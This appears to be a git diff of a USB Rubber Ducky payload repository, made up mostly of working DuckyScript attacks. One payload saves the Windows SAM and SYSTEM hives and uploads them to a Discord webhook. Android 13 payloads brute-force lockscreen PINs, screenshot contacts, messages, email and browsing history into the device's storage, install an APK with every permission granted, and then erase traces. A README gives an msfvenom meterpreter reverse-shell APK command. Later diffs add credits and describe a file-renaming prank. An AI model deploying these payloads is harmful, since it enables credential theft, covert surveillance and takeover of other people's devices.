DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
END_EXTENSION
DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
GUI d
DELAY 1000
GUI r
DELAY 1000
STRINGLN powershell Start-Process powershell -Verb runAs
DELAY 3000
LEFTARROW
ENTER
DELAY 3000
STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
DELAY 500
GUI d

View File

@ -0,0 +1,190 @@
REM #TITLE: Android 13 Payload
REM #AUTHOR: $@LVAT10N!
REM #DESCRIPTION: Android payload to support android 13. This payload will
REM # brute force a 4 digit pin. The first five strings you can add possible
REM # pins gathered from recon data by replacing the x's with pins or delete
REM # these lines if you just want random generated pins.The pin length can be
REM # modified by X string length and adding addtional "RANDOM_NUMBER" entries
REM # below to increase the length of the random pins that are generated.
REM # This is a run once script intended for engagements.
DELAY 3000
ATTACKMODE HID
REM # Scroll up, wake screen and start cracking
SPACE
DELAY 100
SPACE
DELAY 1000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 2000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 2000
STRING X
STRING X
STRING x
STRING X
ENTER
DELAY 2000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 2000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 32000
SPACE
DELAY 100
SPACE
DELAY 100
SPACE
DELAY 100
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 32000
SPACE
DELAY 100
SPACE
DELAY 100
SPACE
DELAY 100
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 60000
SPACE
DELAY 100
SPACE
DELAY 100
SPACE
DELAY 100
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 60000
DELAY 60000
SPACE
DELAY 100
SPACE
DELAY 100
SPACE
DELAY 100
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER
DELAY 2000
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
RANDOM_NUMBER
ENTER

View File

@ -0,0 +1,126 @@
REM #TITLE: Android 13 Payload
REM #AUTHOR: $@LVAT10N!
REM #DESCRIPTION: Android payload to support android 13. This payload will
REM # brute force a pin and change the default language on the target device
REM # Once the pin is cracked click the ducky button once to start the payload
BUTTON_DEF
ATTACKMODE HID
DELAY 2000
REM # Navigate to home screen
GUI ENTER
DELAY 2000
REM # move to settings menu
GUI z
DELAY 1000
REM Search for general management
ENTER
DELAY 1000
STRING general management
DELAY 1000
REM # Select general management
VAR $FIND = 4
WHILE ( $FIND > 0 )
TAB
DELAY 200
$FIND = ( $FIND - 1 )
END_WHILE
ENTER
DELAY 1000
REM # Select language
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
ENTER
REM # Select "ADD language"
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
ENTER
DELAY 1000
REM # Select language To change to
VAR $CHANGE = 5
WHILE ( $CHANGE > 0 )
DOWNARROW
DELAY 200
$CHANGE = ( $CHANGE - 1 )
END_WHILE
DELAY 200
ENTER
REM # Set as default
DELAY 200
ENTER
DELAY 200
REM # Go home
GUI ENTER
DELAY 1000
REM # Delete all recent tabs that were opened on the device
VAR $WIPE = 8
WHILE ( $WIPE > 0 )
ALT TAB
DELAY 100
ALT F4
DELAY 100
$WIPE = ( $WIPE - 1 )
END_WHILE
REM # If not already at the home screen, going to home screen
DELAY 1000
GUI ENTER
REM # Locking the device back up
DELAY 1000
GUI l
DELAY 100
REM # Turning attackmode off
ATTACKMODE OFF
DELAY 1000
END_BUTTON
DELAY 3000
REM # Scroll up, wake screen and start cracking
REM # The first five strings you can add possible pins gathered from recon
REM # data by replacing the x's with pins or delete these lines, this
REM # payload is for a 4 digit pin. The pin length can be modified by X string
REM # length and adding addtional "RANDOM_NUMBER" entries below to increase
REM # the length of the random pins that are generated.
ATTACKMODE HID
DELAY 100
SPACE
DELAY 100
SPACE
DELAY 1000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 2000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 2000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 2000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 2000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 32000

View File

@ -0,0 +1,26 @@
# ANDROID_BLANKET_PARTY
This repository houses all my Android Rubber Ducky payloads, most of these payloads will also work with a O.MG cable
//BLANKET PArty as in that iconic scene from "FUll MEtal Jacket"//
![image](https://github.com/salvat1on/ANDROID_BLANKET_PARTY/assets/27372029/4ca1e4a8-846d-4da1-b140-8399392bd945)
Swipe-to-open.txt will install an apk to the target device that resides in the ducky storage.
The [STAND-ALONE] Pin / Password lockscreen brute force payloads will also be included in
this Repository.
You can create an APK Payload with metasploit with the following command in the terminal
msfvenom -p android/meterpreter_reverse_tcp LHOST=YOUR_ADDRESS LPORT=5555 -o WHATEVER_NAME.apk
The APK file must then be copied to the ducky along side the bin file you place there as well.
The APK payloads rely on a bug I found and will be reporting soon, within the APP install process
[SWIPE TO OPEN DEMO]
[![IMAGE ALT TEXT HERE](https://i.ibb.co/Yh2D6Vt/swipe.png)](https://youtu.be/Hon9YmdVehQ)
[PIN CRACKER DEMO]
[![IMAGE ALT TEXT HERE](https://i.ibb.co/gJKgg6b/pin-crack.png)](https://youtube.com/shorts/jV1f7E00P_g)

View File

@ -0,0 +1,457 @@
REM #TITLE: Android 13 Payload
REM #AUTHOR: $@LVAT10N!
REM #DESCRIPTION: Android payload to support android 13. This payload will
REM # brute force a 4 digit pin and take 10 screenshots of contacts, 10
REM # screenshots of text logs, 5 screenshots of the browser history,
REM # one screenshot of notifications, one screenshot of current email,
REM # and 1 screenshot of the last number called. Then move all
REM # screenshots to the ducky storage. Once the pin is cracked press the
REM # ducky button once to start stage 2 of the payload ( gathering INTEL)
REM # If you would like to add more pin guesses and pin randomization consider
REM # replacing the bottom of this script with my "pin-crack" attack. This
REM # script is intended to give you 5 attempts with pins you have gathered
REM # from recon.This attack will take all screenshots on the device, not
REM # just the ones the ducky takes, 50% of screenshots are accidents the other
REM # 50% are important things that cannot be forgotten. Make sure your ducky
REM # has enough storage to accomidate this attack.
BUTTON_DEF
ATTACKMODE HID STORAGE
DELAY 2000
REM # If not at homescreen going home
GUI ENTER
DELAY 1000
REM # Open phone
GUI f
DELAY 1000
STRING phone
DELAY 1000
ENTER
DELAY 200
ENTER
DELAY 1500
REM # Pull up last number dialed
ENTER
DELAY 1000
ALT PRINTSCREEN
DELAY 1000
REM # closing out screenshot window
ESC
DELAY 500
REM # Going to homescreen
GUI ENTER
DELAY 1000
REM # open notifications
GUI n
DELAY 1000
REM # Take screenshot
ALT PRINTSCREEN
DELAY 1000
ESC
DELAY 500
REM # Going back to homescreen
GUI ENTER
DELAY 1000
REM # Open email
GUI e
DELAY 2000
REM # Take screenshot of recent inbox
ALT PRINTSCREEN
DELAY 1000
ESC
DELAY 500
REM # Going back to homescreen
GUI ENTER
DELAY 1000
REM # Open browser
GUI b
DELAY 3000
REM # Open browser menu , select history and open
MENU
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
ENTER
REM # Start taking screenshots of browser history
DELAY 1000
ALT PRINTSCREEN
REM # Clearing screenshot window so scrolling can continue
DELAY 500
ESC
DELAY 200
PAGEDOWN
DELAY 200
VAR $FALL = 10
WHILE ( $FALL > 0 )
DOWNARROW
DELAY 200
$FALL = ( $FALL - 1 )
END_WHILE
DELAY 1000
ALT PRINTSCREEN
REM # Clearing screenshot window so scrolling can continue
DELAY 500
ESC
VAR $FALL = 10
WHILE ( $FALL > 0 )
DOWNARROW
DELAY 200
$FALL = ( $FALL - 1 )
END_WHILE
DELAY 1000
ALT PRINTSCREEN
REM # Clearing screenshot window so scrolling can continue
DELAY 500
ESC
VAR $FALL = 10
WHILE ( $FALL > 0 )
DOWNARROW
DELAY 200
$FALL = ( $FALL - 1 )
END_WHILE
DELAY 1000
ALT PRINTSCREEN
REM # Clearing screenshot window so scrolling can continue
DELAY 500
ESC
VAR $FALL = 10
WHILE ( $FALL > 0 )
DOWNARROW
DELAY 200
$FALL = ( $FALL - 1 )
END_WHILE
DELAY 1000
ALT PRINTSCREEN
REM # Clearing screenshot window so scrolling can continue
DELAY 500
ESC
VAR $FALL = 10
WHILE ( $FALL > 0 )
DOWNARROW
DELAY 200
$FALL = ( $FALL - 1 )
END_WHILE
DELAY 1000
ALT PRINTSCREEN
REM # Clearing screenshot window so scrolling can continue
DELAY 500
ESC
DELAY 1000
REM # Returning to Homescreen
GUI ENTER
DELAY 1000
REM # Jump to messages, take screenshot - scroll, rinse and repeat
GUI s
DELAY 1000
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
ALT PRINTSCREEN
DELAY 1000
REM # Closing out screenshot share window
ESC
DELAY 500
VAR $DIP = 15
WHILE ( $DIP > 0 )
DOWNARROW
DELAY 200
$DIP = ( $DIP - 1 )
END_WHILE
ALT PRINTSCREEN
DELAY 1000
REM # Closing out screenshot share window
ESC
DELAY 500
VAR $TRIP = 8
WHILE ( $TRIP > 0 )
DOWNARROW
DELAY 200
$TRIP = ( $TRIP - 1 )
END_WHILE
ALT PRINTSCREEN
DELAY 1000
REM # Closing out screenshot share window
ESC
DELAY 500
VAR $TRIP = 8
WHILE ( $TRIP > 0 )
DOWNARROW
DELAY 200
$TRIP = ( $TRIP - 1 )
END_WHILE
ALT PRINTSCREEN
DELAY 1000
REM # Closing out screenshot share window
ESC
DELAY 500
VAR $TRIP = 8
WHILE ( $TRIP > 0 )
DOWNARROW
DELAY 200
$TRIP = ( $TRIP - 1 )
END_WHILE
ALT PRINTSCREEN
DELAY 1000
REM # Closing out screenshot share window
ESC
DELAY 500
VAR $TRIP = 8
WHILE ( $TRIP > 0 )
DOWNARROW
DELAY 200
$TRIP = ( $TRIP - 1 )
END_WHILE
ALT PRINTSCREEN
DELAY 1000
REM # Closing out screenshot share window
ESC
DELAY 500
VAR $TRIP = 8
WHILE ( $TRIP > 0 )
DOWNARROW
DELAY 200
$TRIP = ( $TRIP - 1 )
END_WHILE
ALT PRINTSCREEN
DELAY 1000
REM # Closing out screenshot share window
ESC
DELAY 500
VAR $TRIP = 8
WHILE ( $TRIP > 0 )
DOWNARROW
DELAY 200
$TRIP = ( $TRIP - 1 )
END_WHILE
ALT PRINTSCREEN
DELAY 1000
REM # Closing out screenshot share window
ESC
DELAY 500
VAR $TRIP = 8
WHILE ( $TRIP > 0 )
DOWNARROW
DELAY 200
$TRIP = ( $TRIP - 1 )
END_WHILE
ALT PRINTSCREEN
DELAY 1000
REM # Closing out screenshot share window
ESC
DELAY 500
VAR $TRIP = 8
WHILE ( $TRIP > 0 )
DOWNARROW
DELAY 200
$TRIP = ( $TRIP - 1 )
END_WHILE
ALT PRINTSCREEN
DELAY 2000
REM # Closing out screenshot share window
ESC
DELAY 1000
REM # Going home
GUI ENTER
DELAY 1000
REM # Jump to contacts, take screenshot - scroll, rinse and repeat
GUI c
DELAY 1000
DOWNARROW
DELAY 1000
ALT PRINTSCREEN
DELAY 1000
REM # Escape is used to close out the window opened after a screenshot is taken
ESC
VAR $CONTACTS = 9
WHILE ( $CONTACTS > 0 )
DELAY 200
PAGEDOWN
DELAY 1000
ALT PRINTSCREEN
DELAY 1000
ESC
$CONTACTS = ( $CONTACTS - 1 )
END_WHILE
DELAY 1000
REM # Jump to file manager, find screenshots folder and move there
GUI r
DELAY 200
REM # Search for recent screenshots
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 1000
REM # Reset keyboard for good measure
RESET
DELAY 500
STRING screenshot
DELAY 1000
ENTER
DELAY 200
REM # Select all screenshots
CTRL a
REM # Select the "move" option
DELAY 1000
PAGEDOWN
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
LEFTARROW
DELAY 200
LEFTARROW
DELAY 200
ENTER
REM # Select the ducky storage as the move location
REM # Jump to previous window
DELAY 1000
TAB
DELAY 200
ENTER
REM # Jump to previous window
DELAY 1000
LEFTARROW
DELAY 200
ENTER
REM # Select ducky storage
VAR $HOP = 5
WHILE ( $HOP > 0 )
DELAY 200
DOWNARROW
$HOP = ( $HOP - 1 )
END_WHILE
ENTER
REM # In ducky storage, select "move here"
DELAY 200
PAGEDOWN
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
RIGHTARROW
DELAY 200
RIGHTARROW
DELAY 200
ENTER
REM # Returning to home
DELAY 1000
GUI ENTER
DELAY 200
REM # Start cleaning up and reduce footprint
REM # Open and close out most recent tabs on the device
VAR $WIPE = 8
WHILE ( $WIPE > 0 )
ALT TAB
DELAY 200
ALT F4
DELAY 200
$WIPE = ( $WIPE - 1 )
END_WHILE
DELAY 200
GUI ENTER
DELAY 1000
REM # Clear device notifications
GUI n
DELAY 500
UPARROW
DELAY 100
RIGHTARROW
DELAY 100
ENTER
DELAY 1000
REM # Return home
GUI ENTER
DELAY 1000
REM # Lock device and turn attackmode off
GUI l
DELAY 300
ATTACKMODE OFF
END_BUTTON
DELAY 3000
REM # Scroll up, wake screen and start cracking
REM # The first five strings you can add possible pins gathered from recon
REM # data by replacing the x's with pins. This payload is for a 4 digit pin.
REM # The pin length can be modified by increasing X string length
ATTACKMODE HID
DELAY 100
SPACE
DELAY 100
SPACE
DELAY 1000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 2000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 2000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 2000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 2000
STRING X
STRING X
STRING X
STRING X
ENTER
DELAY 32000

View File

@ -0,0 +1,126 @@
REM #TITLE: Android 13 Payload
REM #AUTHOR: $@LVAT10N!
REM #DESCRIPTION: Android payload to support android 13. This payload will
REM # install an apk to the target device that resides in the ducky storage.
REM # Payload is for device with "swipe to unlock" lockscreen, no pin or password enabled
DELAY 3000
ATTACKMODE HID STORAGE
REM # scroll up to unlock device
SPACE
DELAY 100
SPACE
DELAY 2000
REM # Open file manager
GUI r
DELAY 2000
REM # Find the ducky in the device file manager.
VAR $SEEK = 4
WHILE ( $SEEK > 0 )
DELAY 200
DOWNARROW
$SEEK = ( $SEEK - 1 )
END_WHILE
ENTER
REM # Select payload
DELAY 2000
VAR $FALL = 13
WHILE ( $FALL > 0 )
TAB
DELAY 100
$FALL = ( $FALL - 1 )
END_WHILE
ENTER
REM # Allow installation of unknown apps (Step 1: Deal with unruly nurse Buck)
DELAY 1000
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 1000
REM # Move slider to allow installation via the file manager (Step 2: Find Bucks truck)
VAR $SLIDER = 12
WHILE ( $SLIDER > 0 )
TAB
DELAY 100
$SLIDER = ( $SLIDER - 1 )
END_WHILE
ENTER
REM # YES!! install the payload ( Step 3: Get in the truck)
DELAY 1500
TAB
DELAY 100
ENTER
REM # I know it's a payload, INSTALL ANYWAY!!
DELAY 1500
TAB
DELAY 100
ENTER
REM # From here the warning screen is exploited by simply waiting
REM # 45 seconds so the device will sleep and the warning times out.
REM # When the device wakes up the apk is installed (Step 4: Wiggle your big toe)
DELAY 45000
SPACE
DELAY 100
SPACE
DELAY 100
SPACE
DELAY 2000
REM # Select and click open
DELAY 200
ENTER
REM # Allow all Permissions for apk
DELAY 1500
VAR $ALLOW = 11
WHILE ( $ALLOW > 0 )
DOWNARROW
DELAY 100
$ALLOW = ( $ALLOW - 1 )
END_WHILE
DELAY 100
RIGHTARROW
DELAY 100
ENTER
REM # Click OK, nobody cares ..
DELAY 1500
TAB
DELAY 100
ENTER
REM # Delete all recent tabs that were opened on the device
DELAY 1000
VAR $WIPE = 8
WHILE ( $WIPE > 0 )
ALT TAB
DELAY 100
ALT F4
DELAY 100
$WIPE = ( $WIPE - 1 )
END_WHILE
REM # If not already at the home screen, going to home screen
DELAY 1000
GUI ENTER
DELAY 1000
REM # Clearing device notifications
GUI n
DELAY 500
UPARROW
DELAY 100
RIGHTARROW
DELAY 100
ENTER
DELAY 1000
REM # Locking the device back up
DELAY 500
GUI l
REM # Setting attackmode to "off"
ATTACKMODE OFF

View File

@ -18,10 +18,6 @@ Open a PowerShell, download the Python script and execute it. The Python script
* ExecutionPolicy Bypass * ExecutionPolicy Bypass
* Python * Python
### Executing program
* Plug in your device
### Settings ### Settings
* Nothing to setup, it is Plug-And-Play * Nothing to setup, it is Plug-And-Play
@ -29,4 +25,26 @@ Open a PowerShell, download the Python script and execute it. The Python script
### FAQs ### FAQs
- Why is the code in one line? - Why is the code in one line?
- In Python if TAB errors are made then execution is blocked so to avoid writing so many DuckyScript STRING elements I wrote everything in one line separating each command by a semicolon. However, the code can be viewed entirely in the script.py file and edited as desired. - In Python if TAB errors are made then execution is blocked so to avoid writing so many DuckyScript STRING elements I wrote everything in one line separating each command by a semicolon. However, the code can be viewed entirely in the script.py file and edited as desired.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -21,3 +21,25 @@ Open a PowerShell, download the Python script and execute it. The Python script
### Settings ### Settings
- Setup your Python script link in the payload.txt file - Setup your Python script link in the payload.txt file
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -17,11 +17,29 @@ Opens a shell, download the image, define the local image path, run a command KD
* Internet Connection * Internet Connection
* Linux KDE * Linux KDE
### Executing program
* Plug in your device
### Settings ### Settings
- Image link - Image link
- Local image path - Local image path
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -72,4 +72,24 @@ Exec=Exec=/usr/lib/code-oss/code-oss --unity-launch %F
# ... # ...
``` ```
![GIF](Change_The_App_That_Will_Be_Runned.gif) ## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -23,3 +23,25 @@ Open a PowerShell, download the Python script and execute it. The Python script
### Executing program ### Executing program
* Plug in your device * Plug in your device
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -18,10 +18,28 @@ Open a PowerShell, download the Python script and execute it. The Python script
* Python installed * Python installed
* ExecutionPolicy Bypass * ExecutionPolicy Bypass
### Executing program
* Plug in your device
### Settings ### Settings
- Setup your Python script link in the payload.txt file - Setup your Python script link in the payload.txt file
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -18,10 +18,28 @@ A script used to prank friends by playing songs through Spotify. Open a PowerShe
* Spotify installed and user logged-in * Spotify installed and user logged-in
* ExecutionPolicy Bypass * ExecutionPolicy Bypass
### Executing program
* Plug in your device
### Settings ### Settings
- Setup the SONG-NAME that you want to play - Setup the SONG-NAME that you want to play
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,118 @@
# Same File Name Prank
This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.
Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.
![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)
> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical.
![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)
> What it looks like instead if you turn on the extension view.
# Index
1. [Features](#features)
2. [Payload Structure](#payload-structure)
- [Conditional Target OS Execution](#conditional-target-os-execution)
- [PowerShell (Windows)](#powershell-windows)
- [Bash (GNU/Linux)](#bash-gnulinux)
3. [How to Use](#how-to-use)
4. [Why not MacOS?](#why-not-macos)
5. [Notes](#notes)
6. [Credits](#credits)
## Features
- **Cross-platform support**: The script can be executed on either **Windows** or **GNU/Linux** systems, based on the defined conditions, unfortunately it could not be published for macOS as well, [read more](#why-not-macos).
- **Recursive renaming**: It renames all directories and files inside a given directory, iterating through subdirectories.
- **Customizable**: Users can modify the base directory path and rename pattern as needed.
## Payload Structure
### Conditional Target OS Execution
The script detects (*from the DEFINE*) the target OS and adapts to either **Windows** or **GNU/Linux**:
- If the target system is **Windows**, the script will execute a PowerShell script.
- If the target system is **Linux**, it will execute a Bash script.
### PowerShell (Windows)
For **Windows** systems, the script:
- Opens **PowerShell** and runs the `Rename-Directories` and `Rename-Files` functions.
- It renames directories by assigning sequential names like `d`, `dd`, etc., and files with names like `a`, `a `, `a `, followed by their respective file extensions.
### Bash (GNU/Linux)
For **GNU/Linux** systems, the script:
- Opens a terminal and executes two Bash functions: `rename_directories` and `rename_files`.
- It performs similar renaming of directories and files, using `mv` to rename them with sequential names (like `d`, `dd`, etc... or `a`, `a `, `a ` etc...).
## How to Use
1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment:
- `DEFINE #TARGET_WINDOWS TRUE`: Leave **#TARGET_WINDOWS** to **TRUE** if the script will run on a Windows system.
- `DEFINE #TARGET_GNU_LINUX FALSE`: Set **TARGET_LINUX** to **TRUE** if the script will run on a GNU/Linux system.
- Ufortunately it could not be published for macOS as well, [read more](#why-not-macos).
- `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash.
Consider that the main route for Windows generally is `C:\Users\Username\` while for GNU/Linux systems it is something like `/home/username/` but in both cases if for istance you add `./Desktop/Hello/World/` you will go to the World folder in the path `C:\Users\Username\Desktop\Hello\World\` for Windows systems and `/home/username/Desktop/Hello/World/`.
Of course, you have to make sure that this folder exists....
![Windows command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/3.png?raw=true)
> How Windows response to the command `cd ./Desktop/Hello/World/`
![Ubuntu command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/4.png?raw=true)
> How Ubuntu response to the command `cd ./Desktop/Hello/World/`
Consider the maximum length of file names on both Windows and GNU/Linux:
- [Limit on file name length in bash \[closed\]](https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash)
|=> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
- [On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)](https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap)
|=> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
2. **Load Payload**: Upload the script to a USB Rubber Ducky device using the **DuckEncoder**.
3. **Execute Payload**: Insert the USB Rubber Ducky into the target machine.
## Why not MacOS?
I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
If I could know the behavior of this script on macOS (*which probably remains completely unchanged from use on GNU/Linux systems*) it could be optimized in that it could be reduced to a **WINDOWS_PASSIVE_DETECT** where if it is not Windows (*so generally GNU/Linux or macOS systems*) the bash script may be fine.
## Notes
- Ensure that the specified directories exist on the target machine.
- Use with caution on sensitive systems, as the renaming process is recursive and may affect large directories.
- Contributions to add support for macOS are welcome.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
